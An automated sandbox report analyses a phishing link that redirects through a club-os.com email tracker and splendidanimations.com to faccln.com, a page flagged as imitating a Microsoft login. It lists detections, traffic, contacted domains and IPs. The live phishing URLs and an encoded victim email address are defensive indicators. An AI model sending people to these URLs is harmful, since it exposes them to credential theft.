Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=

Overview

General Information

Sample URL:https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=
Analysis ID:1428367
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Yara detected Phisher
Phishing site detected (based on image similarity)
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'forgot password' link found
Stores files to the Windows start menu directory

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 2840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20= MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 1392 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,6662949074908214511,13514057785016204619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
dropped/chromecache_94JoeSecurity_Phisher_2Yara detected PhisherJoe Security

    HTML

    SourceRuleDescriptionAuthorStrings
    3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Yara detected HtmlPhish10
      Source: Yara matchFile source: 3.7.pages.csv, type: HTML
      Yara detected Phisher
      Source: Yara matchFile source: dropped/chromecache_94, type: DROPPED
      Phishing site detected (based on image similarity)
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90Matcher: Found strong image similarity, brand: MICROSOFT
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: Number of links: 0
      Source: https://faccln.com/Tdsweaza@bigge.comHTTP Parser: Base64 decoded: https://faccln.com/Tdsweaza@bigge.com
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: Title: 527c8e28b68fef59b4e5d6fd0b96d32c6621765d22bc8 does not match URL
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: Invalid link: Fjojrjgjojtj jmjyj jpjajsjsjwjojrjd
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: <input type="password" .../> found
      Source: https://faccln.com/Tdsweaza@bigge.comHTTP Parser: No favicon
      Source: https://faccln.com/Tdsweaza@bigge.comHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/xpp6i/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
      Source: https://faccln.com/Tdsweaza@bigge.comHTTP Parser: No favicon
      Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/xpp6i/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: No favicon
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: No favicon
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: No <meta name="author".. found
      Source: https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.126.7.35:443 -> 192.168.2.17:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49745 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownTCP traffic detected without corresponding DNS query: 184.31.62.93
      Source: unknownDNS traffic detected: queries for: tracker.club-os.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.31.62.93:443 -> 192.168.2.17:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.17:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.126.7.35:443 -> 192.168.2.17:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.21.200:443 -> 192.168.2.17:49745 version: TLS 1.2
      Source: classification engineClassification label: mal60.phis.win@20/21@30/171
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,6662949074908214511,13514057785016204619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1932,i,6662949074908214511,13514057785016204619,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
      Registry Run Keys / Startup Folder      		1
      Process Injection      		1
      Masquerading      		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Registry Run Keys / Startup Folder      		1
      Process Injection      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      No Antivirus matches

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      splendidanimations.com
      		192.185.104.70
      		truefalse
        		unknown
        a.nel.cloudflare.com
        		35.190.80.1
        		truefalse
          		high
          sni1gl.wpc.upsiloncdn.net
          		152.195.19.97
          		truefalse
            		unknown
            tracker.club-os.com
            		34.205.254.71
            		truefalse
              		high
              challenges.cloudflare.com
              		104.17.3.184
              		truefalse
                		high
                www.google.com
                		108.177.122.105
                		truefalse
                  		high
                  unpkg.com
                  		104.17.248.203
                  		truefalse
                    		high
                    faccln.com
                    		104.21.80.170
                    		truefalse
                      		unknown
                      aadcdn.msauthimages.net
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://splendidanimations.com/@/Bigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=false
                          		unknown
                          https://faccln.com/Tdsweaza@bigge.comfalse
                            		unknown
                            https://faccln.com/d740c10c7b9cf800d441f265844201e16621765d22d8ePASd740c10c7b9cf800d441f265844201e16621765d22d90true
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              1.1.1.1
                              		unknownAustralia
                              		13335CLOUDFLARENETUSfalse
                              104.21.80.170
                              		faccln.comUnited States
                              		13335CLOUDFLARENETUSfalse
                              74.125.138.139
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              104.17.248.203
                              		unpkg.comUnited States
                              		13335CLOUDFLARENETUSfalse
                              152.195.19.97
                              		sni1gl.wpc.upsiloncdn.netUnited States
                              		15133EDGECASTUSfalse
                              172.253.124.94
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              173.194.219.94
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              104.17.3.184
                              		challenges.cloudflare.comUnited States
                              		13335CLOUDFLARENETUSfalse
                              239.255.255.250
                              		unknownReserved
                              		unknownunknownfalse
                              64.233.185.84
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              64.233.185.95
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              35.190.80.1
                              		a.nel.cloudflare.comUnited States
                              		15169GOOGLEUSfalse
                              142.250.9.113
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              34.205.254.71
                              		tracker.club-os.comUnited States
                              		14618AMAZON-AESUSfalse
                              104.17.2.184
                              		unknownUnited States
                              		13335CLOUDFLARENETUSfalse
                              108.177.122.105
                              		www.google.comUnited States
                              		15169GOOGLEUSfalse
                              192.185.104.70
                              		splendidanimations.comUnited States
                              		46606UNIFIEDLAYER-AS-1USfalse

                              Private

                              IP
                              192.168.2.17

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1428367
                              Start date and time:2024-04-18 21:35:18 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Sample URL:https://tracker.club-os.com/campaign/click?msgId=f8ea317d963149a518aa35e03e5541f797badf3c&target=splendidanimations.com%2F%40%2FBigge/aDRmd79087aDRmd79087aDRmd/ZHN3ZWF6YUBiaWdnZS5jb20=
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:19
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal60.phis.win@20/21@30/171

                              Warnings

                              • Exclude process from analysis (whitelisted): svchost.exe
